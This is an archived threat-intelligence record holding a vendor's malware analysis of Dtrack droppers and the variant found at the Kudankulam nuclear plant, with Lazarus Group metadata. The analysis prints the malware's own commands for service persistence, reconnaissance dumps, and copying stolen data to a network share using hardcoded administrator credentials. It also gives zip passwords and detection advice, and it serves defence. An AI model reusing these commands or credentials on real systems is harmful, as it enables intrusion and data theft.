{ "id": "7f54d8fa-7eeb-4c3e-af04-0adeac201505", "created_at": "2026-04-06T00:20:55.009559Z", "updated_at": "2026-04-10T03:38:19.511319Z", "deleted_at": null, "sha1_hash": "bbd2e38e0a210917ec9f3b697f17ed91da4eafa3", "title": "Dtrack: In-depth analysis of APT on a nuclear power plant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 93002, "plain_text": "Dtrack: In-depth analysis of APT on a nuclear power plant\r\nBy sharon\r\nPublished: 2019-11-21 · Archived: 2026-04-05 16:25:07 UTC\r\nDtrack is a RAT (Remote Administration Tool) allegedly written by the North Korean Lazarus group.\r\nRecently the Dtrack malware was found in the Indian nuclear power planet “Kudankulam Nuclear Power Plant”\r\n(KNPP). The variant of Dtrack that attacked this power planet included hardcoded credentials for KNPP’s internal\r\nnetwork, suggesting that it was a targeted attack. It is probably a second phase of an attack since the APT already\r\nhad a foothold in the network, including  a compromised file share and stolen credentials. The earlier quiet\r\nreconnaissance stage of the APT was only for collection of initial information to assist preparation of the future\r\nattack.\r\nAs a RAT, Dtrack contains a variety of functions to execute on the victim’s machine: downloading and uploading\r\nfiles, dumping disk volume data, executing processes, etc. The sample that was found on KNPP steals user data\r\nsuch as browser history, IP addresses information, files list, etc.\r\nCyberbit EDR malware research team investigated 4 Dtrack samples: 3 droppers and the KNPP variant.\r\nWe found that the droppers’ techniques were very similar to malware we previously researched: BackSwap (A\r\nbanker trojan) We also provide an in-depth technical analysis of the sample found on KNPP.\r\nThis post includes:\r\nTechnical analysis of the Dtrack droppers and their connection to our previous research on BackSwap and\r\nUrsnif\r\nTechnical analysis of the Dtrack variant found on KNPP\r\nHow Cyberbit EDR detects both Dtrack’s droppers and the KNPP variant\r\nSuggestions of practical steps to identify Dtrack samples in the wild.\r\nTechnical analysis of 3 Dtrack droppers\r\nBackSwap and Ursnif Refresher\r\nThe BackSwap malware hides in replicas of legitimate programs such as OllyDbg, 7-Zip and FileZilla.\r\nIt plants its malicious code in the initialization phase of the program, in an early stage of the program execution,\r\nreplacing the normal flow with its malicious instructions. The program will not return to its normal execution after\r\nthe malicious code had begun running.\r\nBy hiding inside legitimate programs, it achieves two advantages:\r\nThe icon and the details of this executable seem legitimate to the user, hiding the true nature of the file.\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 1 of 9\n\nBackSwap’s code is much smaller than the program’s code. NGAV and AV software may only scan part of\r\nthe executable and might miss BackSwap’s malicious code in the file.\r\nWe will show one sample of Dtrack that uses this technique of hiding in a replica of a legitimate program.\r\nThe Ursnif malware variant that we found was compiled with the NX-bit not set. Therefore, code can be executed\r\nfrom the heap/stack of its process.\r\nThis technique also makes analysis more difficult – since allocating memory on the heap, by using the malloc\r\nfunction for example, occurs many times during program execution and is widely used for legitimate operations –\r\nsuch as creating new objects in a C++ program.\r\n VirtualAlloc function however, is more common among malware for allocating memory for unpacking code. It is\r\neasier to trace and detect. It creates a new memory region that can be easily spotted.\r\nWe will show two samples of Dtrack that use this  NX-bit not set technique.\r\nSample 1\r\nSHA256: fe51590db6f835a3a210eba178d78d5eeafe8a47bf4ca44b3a6b3dfb599f1702\r\nThis sample uses the same technique that BackSwap used for hiding its code.\r\nIf we look at the file properties under the details tab, we see that it is masquerading as the the “Safe Banking\r\nLauncher” application by “Quick Heal AntiVirus”. However, in fact it’s the program “VNC Viewer” that was\r\npatched by the malware. We can see this by the icon of this file and its strings. This is a slight variation on the\r\nBackSwap technique – since BackSwap didn’t change the program’s details.\r\n1\r\nFigure 1 – Details of the PE – “Safe Banking Launcher” by “Quick Heal AntiVirus”\r\nFigure 2 – VNC icon\r\n3\r\nFigure 3 – Strings found in the file related to VNC\r\nLike BackSwap, this file is patched in the initialization phase of the program. The function at 0x403E90 is patched\r\nand is called subsequently from WinMain. Have a look at the execution flow:\r\n4\r\nFigure 4 – The execution flow until the function at 0x403E90 is called\r\nWe see this function’s return command is missing. Instead, we see the error “sp-analysis failed”, which means that\r\nIDA failed to trace the value of the stack pointer.\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 2 of 9\n\nShortly after, we see a pattern in the function that resembles the one in BackSwap (SHA256:\r\n16fe4de2235850a7d947e4517a667a9bfcca3aee17b5022b02c68cc584aa6548):\r\nA lot of instructions that do not touch the stack but only the registers\r\nCalls to LoadLibrary, GetProcAddress followed by a call to VirtualAlloc, which in all the parameters are\r\npushed to the stack. The “push” instructions are scattered among other instructions. The other instructions\r\nare not related to the values of the parameters passed to these function calls. Therefore, it makes analysis\r\nmore difficult.\r\n5\r\nFigure 5 – The patch starts at 0x403F9F\r\n6\r\nFigure 6 –Push instructions for VirtualAlloc  – Dtrack on the left vs. BackSwap\r\nThe allocated region by the VirtualAlloc is filled with an encrypted code and a code for its decryption, both from\r\nthe .text section. The decryption code runs first and the encrypted code is executed after it has been decrypted.\r\nThat’s similar to the BackSwap sample with SHA256:\r\n6bb85a033a446976123b9aecf57155e1dd832fa4a7059013897c84833f8fbcf7 (Read more about it in our blog post)\r\nThe decryption code is quite lengthy, its size is 1379 bytes.\r\n7\r\nFigure 7 – Part of the decryption code (ends at 0x003E0563) and part of the encrypted code starts at\r\n0x003E0563\r\nAs in BackSwap, the decrypted code is also a PIC (Position-Independent-Code) and evidence for that of the\r\nretrieval of addresses of modules from the PEB (see figure 8).\r\n8\r\nFigure 8 – After decryption, we can see a meaningful code that starts at 0x003E0569. At address\r\n0x003E059D, the malware looks at the PEB, later to retrieve addresses of loaded modules\r\nThe decrypted code is responsible for the rest of the malware operations – hollowing a chosen Windows process,\r\nunpacking the RAT from the file’s overlay into the hollowed process and executing the RAT.\r\nSample 2\r\nSHA256: 58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb\r\nThis sample is quite different. This is not a replica of a legitimate program, but rather a program that the malware\r\nauthors wrote from scratch.\r\n It is written in C++ using MFC. upon first examination, nothing appears suspect, as there are no strings. Because\r\nthis is an MFC project, it contains a lot of code that is not related to the malware code. Hence it is much more\r\ndifficult to locate and analyze the real malicious code. Again, this is done to complicate analysis and evade NGAV\r\nsolutions that may only scan parts of the file.\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 3 of 9\n\nThe executable was compiled with the NX-bit not set, as in the Ursnif dropper. This allows code to also be\r\nexecuted from the heap – another trick which complicates analysis – since allocating memory on the heap is very\r\ncommon, especially in C++ object-oriented programs. VirtualAlloc is the function we expect to find during the\r\nprocess of unpacking code.\r\nWhere is the malicious code hidden?\r\nThe function at 0x404860 is a virtual function of a CWnd object. Inside it, there are two functions: one for\r\nresolving functions’ addresses, and another one for unpacking and executing a shellcode.\r\n9\r\nFigure 9 – The function at 0x404860 has calls to functions that contain the malicious code\r\nTo execute this function, a CWnd object instance is created and the function at 0x404860 is called on this\r\ninstance.\r\nTo benefit from the absence of the NX-bit, the malware uses the malloc function which allocates memory on the\r\nheap – for allocating memory for a shellcode. It uses VirtualProtect on the heap, although it doesn’t matter since\r\nthe NX-bit is not set.\r\nMemory is allocated on the heap, an encrypted shellcode is copied from the file’s overlay to the heap and then\r\ndecrypted.\r\nThe decrypted code is responsible for the rest of the malware operations – hollowing a chosen Windows process,\r\nunpacking the RAT from the file’s overlay into the hollowed process and executing the RAT.\r\nNote that compared to the previous sample, both the shellcode and the RAT are hidden in the file’s overlay.\r\n10\r\nFigure 10 – Inside the function 0x4021a0, the overlay information is read, and a memory at the size\r\nof the overlay is allocated on the heap using malloc\r\n11\r\nFigure 11 – A shellcode is copied from the file to the memory that was allocated on the heap. The\r\nshellcode is decrypted and later executed\r\nSample 3\r\nSHA256: 9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd\r\nThis sample is very similar to the second sample we mentioned, so I won’t go into all the details again. It has very\r\nslight differences but it still uses the same technique with the NX-bit not set. The only major difference we found\r\nin this sample, is that it doesn’t create a hollowed process for unpacking the RAT, but rather it unpacks the RAT\r\ninto its own process memory.\r\nCyberbit EDR detects Dtrack dropper payload\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 4 of 9\n\nCyberbit EDR is a military-grade solution developed to detect this type of sophisticated, targeted attack against\r\nhighly-sensitive government and critical infrastructure organizations. It successfully detects both the dropper and\r\nthe final payload of Dtrack.\r\nThis is how Cyberbit EDR detects the first dropper we analyzed: (Sample 1):\r\nDtrack_12\r\nFigure 12 – Cyberbit’s EDR detects the dropper of Dtrack\r\nThe dropper creates a suspended Microsoft process from a predefined list, in this case napstat.exe (Network\r\nAccess Protection Client UI). It injects code into it by allocating memory, writing into it, modifying the thread\r\ncontext structure and then resuming the thread execution.\r\nThe reflective loading behaviour alerts us that a malicious PE module was loaded reflectively into napstat.exe. It\r\nis a file-less technique to load a PE into a process without placing a file on the disk, allowing it to bypass NGAV\r\nand AV software.\r\nnapstat.exe now contains the RAT, which adds persistence to the dropper by adding it as a service called\r\n‘WBService’.\r\n“C:\\Windows\\system32\\cmd.exe” /c sc create “”WBService”” type= own type= interact start= auto error=\r\nignore binpath= “cmd.exe /k start\r\nC:\\U8fVCdX\\58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb.exe”\r\n13\r\nFigure 13 – The command executed by napstat.exe – showing a service that was added for\r\npersistency of the malware\r\nKNPP Dtrack variant – Technical analysis and detection by Cyberbit EDR\r\nCyberbit EDR  detects the Dtrack variant found on KNPP (see figure 27), the Indian power plant.\r\nFirstly, let’s provide some technical details about this sample:\r\nSHA256: bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364 –\r\nThis sample comes unpacked.\r\nSimilarity to other Dtrack samples:\r\nThe variant that was found on the KNPP network shares some similarities with the previous Dtrack samples\r\nanalyzed in this post. We refer here to the unpacked versions of the previous samples.\r\nThe first being the string decryption function:\r\n14\r\nFigure 14 – On the left: The string decryption function of the KNPP variant. On the right – the\r\nstring decryption function from one of samples above (SHA256 :\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 5 of 9\n\n9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd – unpacked)\r\nThe second being the API resolving function:\r\n15\r\nFigure 15 – On the left: APIs resolving function of the KNPP variant. On the right – the APIs\r\nresolving function from one of samples above (SHA256 :\r\n9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd – unpacked)\r\nHowever, the RAT capabilities were stripped down from the KNPP variant.\r\nWhat is odd here – the authors left resolving of APIs that were not used at all in the KNPP variant, for example\r\nAPIs related to HTTP communications. These are leftovers from the RAT. \r\nIt is important to note this sample contains many functions used for collection of information.\r\nGeneration of a machine identifier\r\nFirst, the sample collects information about the machine to create an identifier for it. The identifier is in the form\r\nof 8-letters hexadecimal value. The information used for creating the identifier includes registry values\r\n(RegisteredOwner, RegisteredOrganization, InstallDate), computer name and adapter information (MAC\r\naddresses).\r\n16\r\nFigure 16 – Gathering information for creating an identifier for the machine\r\n17\r\nFigure 17 – Getting adapter information\r\nThe function below generates the identifier (checksum) based on the information collected and 2 constant values –\r\n4 and 0x61e6f6e (‘anon’ in ascii).\r\n18\r\nFigure 18 – The function that generates the identifier\r\nAfter generating the identifier, the malware collects the following information from the machine:\r\nipconfig output\r\nrunning processes\r\nnetstat output\r\nnetsh output\r\nBrowser history\r\nConnection status to 4 different IP addresses\r\nList of files, per volume, on the machine\r\n19\r\nFigure 19 – The main function responsible for data collection and exfiltration\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 6 of 9\n\nThe commands are straight forward – they are executed, and the results of each command are saved in\r\nseparate files\r\nThe function lookup_ips checks the connection status to 4 different ip addresses: 172.22.22.156,\r\n10.2.114.1, 172.22.22.5, 10.2.4.1. The connection status is saved to the browser.his file  – the same file that\r\ncontains the web browsers history\r\nWe will drill down into the web browsers history collection and the list of files collection.\r\nRetrieving the web browsers’ history\r\nThe function get_browser_history (figure 20) works as follows\r\n1. Checks the OS version to determine in which path to search for the browser history and call\r\ncollect_browser_history (figure 21)\r\n2. collect_browser_history: gets FireFox \u0026 Chrome history by calling fetch_with_sqlite function (figure 22)\r\n3. fetch_with_sqlite: Copy the history into a file called “MSI17f1f.tmp”. use SQL queries to retrieve the\r\nbrower’s history from this file and write the results to the ‘browser.his’ file\r\n20\r\nFigure 20 – Checking the OS version to determine search path and calling a function to collect the\r\nbrowser history\r\n21\r\nFigure 21 – collect_browser_history: Searching for browser history files\r\n22\r\nFigure 22 – Fetch the browser history using sqlite queries and write it to a file\r\nRetrieving the list of files on the machine\r\nThe function find_filenames_in_volumes (figure 23) works as follows:\r\n1. Iterate over the machine’s volumes and search for removable drives, disk drives and network drives. Call\r\nfind_and_compress_filenames_per_volume (figure 24) for each volume.\r\n2. find_and_compress_filenames_per_volume:\r\n3. For each drive, search for all the files in the drive, and list their names.\r\n4. Write this list in a $VOLUME_LETTER.dat file\r\n5. Creates a password-protected zip file with a tmp extension called $VOLUMER_LETTER.tmp. This tmp\r\nfile contains $VOLUMER_LETTER.dat. The password is hard-coded: dkwero38oerA^t@#\r\n23\r\nFigure 23 – Go over the volumes of the machine, check if the drive type is a removable disk, hard\r\ndisk or a network drive\r\n24\r\nFigure 24 – This function lists all the files in a specified volume, writes them into a dat file and\r\ncompresses them in a password-protected zip file\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 7 of 9\n\nAfter the malware finishes collecting the information, it creates a zip file with a tmp file extension in the form of\r\n~$[MACHINE_IDENTIFER]MT.tmp (without the brackets), protected with the hard-coded password: abcd@123.\r\nIn this zip file, it stores the results of the commands and the zip files of the list of files mentioned above (that\r\nhappens at add_files_to_archive functionat figure 16).\r\nThis file is then copied to a network share at \\\\\\\\10.38.1.35\\\\C$\\\\Windows\\\\Temp\\\\MpLogs\\\\\r\nThe credentials to this network share (password: su.controller5kk username: /user:KKNPP\\\\administrator) are also\r\nhard-coded in the malware.\r\nLet’s look at the structure of this zip file:\r\n25\r\nFigure 25 – Structure of the zip file\r\nThe main zip file is protected with the password abcd@123. When unzipping it, we see a folder with the name:\r\n$MACHINE_IDENTIFER-$MACHINE_IP. The machine identifier was calculated as described above.\r\nThis folder contains 5 files:\r\nbrowser.his – browser history\r\nnetsh.res – netsh command results\r\nnestsat.res – netstat command results\r\nres.ip – ipconfig command results\r\ntask.list – running processes\r\nThere is another folder with the name: $MACHINE_IP. Let’s look inside it:\r\nIt has a file called c.tmp. This is actually a zip file encrypted with the password: dkwero38oerA^t@#\r\nThis zip file contains a file called c.dat – which has the list of the files on the C: drive.\r\n26\r\nFigure 26 – The “c” file is a password-protected zip file which contains a dat file that has the list of\r\nall the files in the C: drive\r\nThis is how Cyberbit EDR detects this Dtrack variant:\r\n27-1024x552\r\nUpon execution, Dtrack collects a lot of information about the machine. It also includes hardcoded credentials and\r\nIP addresses – suggesting it was a sophisticated targeted attack. All the commands are traced by our agent. In\r\nadditional, we can see “Sensitive file accessed” behavior, suggesting that sensitive browser history files were\r\naccessed, as described previously. The commands are as follows:\r\n“C:\\Windows\\system32\\cmd.exe” /c ping -n 3 127.0.0.1 \u003eNUL \u0026 echo EEEE \u003e “” – Delays execution\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 8 of 9\n\n“C:\\Windows\\system32\\cmd.exe” /c net use \\\\10.38.1.35\\C$ /delete  – Deletes a mapped network drive at\r\n10.38.1.35\r\n“C:\\Windows\\system32\\cmd.exe” /c move /y\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\\~A7BBB42AMT.tmp \\\\10.38.1.35\\C$\\Windows\\Temp\\MpLogs\\ \r\n– Copies a password-protected .zip file with stolen information from other commands to the target\r\nlocation\r\n“C:\\Windows\\system32\\cmd.exe” /c net use \\\\10.38.1.35\\C$ su.controller5kk /user:KKNPP\\administrator –\r\nTries to connect to a mapped network drive via hardcoded credentials\r\n“C:\\Windows\\system32\\cmd.exe” /c netsh interface ip show config \u003e\r\n“C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\\temp\\netsh.res” – Dump network interfaces information\r\n“C:\\Windows\\system32\\cmd.exe” /c tasklist \u003e “C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\\temp\\task.list”\r\n– Dumps the running processes list into a file\r\n“C:\\Windows\\system32\\cmd.exe” /c ipconfig /all \u003e\r\n“C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\\temp\\res.ip” – Dump ipconfig information into a file\r\n“C:\\Windows\\system32\\cmd.exe” /c netstat -naop tcp \u003e\r\n“C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\\temp\\netstat.res” – Dump netstat command information\r\ninto a file\r\n28\r\nFigure 28 – The commands can be seen on the right panel. This particular commands contains\r\nhardcoded credentials, suggesting that this was a sophisticated targeted attack\r\nDtrack detection suggestions\r\nEffective detection of this type of highly-targeted malware is likely to generate false-positives that requires skilled\r\nanalysts. This is not acceptable for most enterprise-grade EDR solutions and therefore they have difficulty\r\ndetecting them. Based on the techniques/IOCs found in our analysis, we suggest targeted critical organizations\r\nfollow these detection steps. \r\nUse the hashes (SHA256) we mentioned and blacklist them.\r\n*Note: new hashes emerge all the time, as they can easily be changed.\r\nSearch for programs that perform delayed execution using ping -n command.\r\nSearch for excessive use of network configuration commands from a single host such as “netstat.exe”,\r\n“net.exe use”, ”ipconfig.exe” and “netsh.exe”\r\nSearch for process which add a new service usually named ‘WBService’\r\nSearch for an unsigned file that is performing code injection/code hollowing into the Microsoft process\r\nLook for files where the description doesn’t match the icon. for example, “VNC Viewer” icon for a file\r\ndescribed as “Safe Banking Launcher”\r\nWatch FREE Webinar: How to Prevent the Next Financial Cyberattack with Next-Gen Technology?\r\nSource: https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/" ], "report_names": [ "dtrack-apt-malware-found-in-nuclear-power-plant" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434855, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bbd2e38e0a210917ec9f3b697f17ed91da4eafa3.pdf", "text": "https://archive.orkl.eu/bbd2e38e0a210917ec9f3b697f17ed91da4eafa3.txt", "img": "https://archive.orkl.eu/bbd2e38e0a210917ec9f3b697f17ed91da4eafa3.jpg" } }